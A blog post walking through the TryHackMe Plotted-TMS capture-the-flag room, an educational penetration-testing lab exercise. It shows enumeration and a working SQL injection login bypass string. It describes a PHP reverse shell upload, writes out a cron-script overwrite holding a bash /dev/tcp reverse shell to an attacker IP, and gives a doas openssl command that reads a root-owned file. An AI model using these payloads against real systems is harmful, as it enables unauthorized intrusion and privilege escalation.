narancs's blog

TryHackMe – Plotted-TMS walkthrough

Introduction

TryHackMe Plotted-TMS logo

In this post I will explain how I completed the Plotted-TMS room on TryHackMe. This is an easy difficulty room. We can get initial access on the target through a vulnerability in a web application. Then we can escalate our privileges: first get a shell as another non-root user by exploiting a cron job, then getting root access using a sudo privilege.

Enumeration

Results of nmap scan:

3 ports are open:

  • SSH is running on default port 22.
  • An Apache web server is running on port 80, that is default for HTTP.
  • Port 445: By default this port is reserved for Microsoft Directory Services (Active Directory and SMB file sharing). However, nmap correctly identified that in this case there is another Apache server that is listening on this port.

Both of the websites serve the default Apache page, so there is nothing interesting at first glance. I used gobuster to enumerate files and directories on the websites.

First I scanned for files on the website running on port 80. It is the default port gobuster will use, so we do not need to specify it. The target IP in my case was 10.10.209.35.

				
					gobuster dir --url http://10.10.209.35/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 32
				
			

gobuster were able to discover the following 3 files:

  • id_rsa: the content of the file is base64 encoded text:
    • VHJ1c3QgbWUgaXQgaXMgbm90IHRoaXMgZWFzeS4ubm93IGdldCBiYWNrIHRvIGVudW1lcmF0aW9uIDpE
    • Decoded text:
      • Trust me it is not this easy..now get back to enumeration :D
  • passwd and shadow: these files contained the same base64 encoded text:
    • bm90IHRoaXMgZWFzeSA6RA==
    • Decoded text:
      • not this easy :D

It looked promising but it was just a rabbit hole. Then I enumerated the website running on port 445.

				
					gobuster dir --url http://10.10.209.35:445/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 32
				
			

Only 1 page was found: /management. I opened it in the browser:

It is a web application named Traffic Offense Management System (TOMS). Several exploits are available on Exploit Database for this web app.

Exploitation

While looking through the available exploits, I have found the following in exploit 50244:

				
					post_data = {"username": "admin' or '1'='1'#", "password": ""}
				
			

The script used this post data to exploit an SQL injection vulnerability. I tested it manually at the login page /management/admin/login.php, I entered username:

				
					admin' or '1'='1'#
				
			

I left the password empty, it does not matter. It worked, I was logged in as Administrator.

TOMS - Logged in as Administrator

Then I checked the different menu options in the web app, and found a way to upload files. I clicked on the user name in the top right corner then choose My Account option. On that page we can upload files for our avatar.

I was able to upload a PHP reverse shell to get initial access on the target.

User flag

After getting a shell as www-data user I checked the files in /var/www/ directory.

				
					www-data@plotted:/var/www$ ls -l
total 8
drwxr-xr-x 4 root     root     4096 Oct 28 09:18 html
drwxr-xr-x 2 www-data www-data 4096 Oct 28 09:10 scripts
www-data@plotted:/var/www$
				
			

There is an interesting directory named scripts. It contains a file named backup.sh:

				
					#!/bin/bash
/usr/bin/rsync -a /var/www/html/management /home/plot_admin/tms_backup
/bin/chmod -R 770 /home/plot_admin/tms_backup/management
				
			

I checked /etc/crontab and found that it is executed every minute by plot_admin user. I did not find anything exploitable in the script itself, and it is owned by plot_admin so we cannot edit the file. However, file creation/deletion is controlled by directory permissions and the directory is owned by www-data user. That means we can delete the file and re-create it with arbitrary content.

I removed the file and created a reverse shell.

				
					echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<IP_ADDRESS>/9999 0>&1' > backup.sh
chmod +x backup.sh
				
			

I started the listener and within a minute I received a shell as plot_admin user. The user flag was in the home directory.

Root flag

I checked for SUID binaries.

				
					find / -perm -u=s -type f 2>/dev/null;
				
			
These were the found binaries, if we ignore the files in /snap/... directories.
				
					/usr/bin/passwd
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/at
/usr/bin/chsh
/usr/bin/umount
/usr/bin/doas
/usr/bin/newgrp
/usr/libexec/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
				
			

The binary that was suspicious to me is /usr/bin/doas. I did not heard about doas before, so I did some research and found that it is a replacement of the sudo command that was developed for OpenBSD systems. The definition of privileges are written in /etc/doas.conf configuration file. I checked this file and it contained one line:

				
					permit nopass plot_admin as root cmd openssl
				
			

This means that plot_admin user is allowed to execute openssl as root without password. I checked GTFOBins how could I use this to get the root flag.

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

I used the following command to read/root/root.txt file and output it as base64 encoded text, then pipe it to base64 decoder to get the flag.

				
					doas openssl enc -base64 -in /root/root.txt | base64 -d
				
			

Table of Contents

Subscribe
Notify of
guest
1 Comment
Newest
Oldest
Inline Feedbacks
View all comments
Anonymous
Good walktrought

Related posts

1
0
Would love your thoughts, please comment.x
()
x